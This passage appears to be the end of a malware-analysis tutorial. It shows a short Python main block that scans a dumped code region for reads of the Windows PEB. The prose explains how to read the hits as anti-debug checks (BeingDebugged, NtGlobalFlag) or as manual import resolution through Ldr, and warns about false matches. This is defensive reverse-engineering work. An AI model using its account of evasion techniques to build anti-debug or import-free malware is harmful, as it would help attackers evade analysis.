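if __name__ == "__main__":
    for h in find_peb_reads(SAMPLE_CODE):
        print(f"0x{h.offset:04x}  {h.register:<5} -> {h.field or 'unknown'}")
    print(dict(summarize(find_peb_reads(SAMPLE_CODE))))
    print(dict(count_report_rows(SAMPLE_ROWS)))
```

Run it over a dumped code region (for this sample, the 0x1E23xxxx-0x1E30xxxx range the report attributes the reads to) rather than the packed file on disk, since the loader decrypts that stage in memory. Hits labelled BeingDebugged or NtGlobalFlag are the anti-debug checks; hits labelled Ldr are the manual import resolution that explains why the stage needs no import table. Treat the field label as a pointer to where to look in the disassembler, not as proof: the ModRM search can match an unrelated byte, and a compiler that spills the PEB pointer to the stack before using it will come back as "unknown".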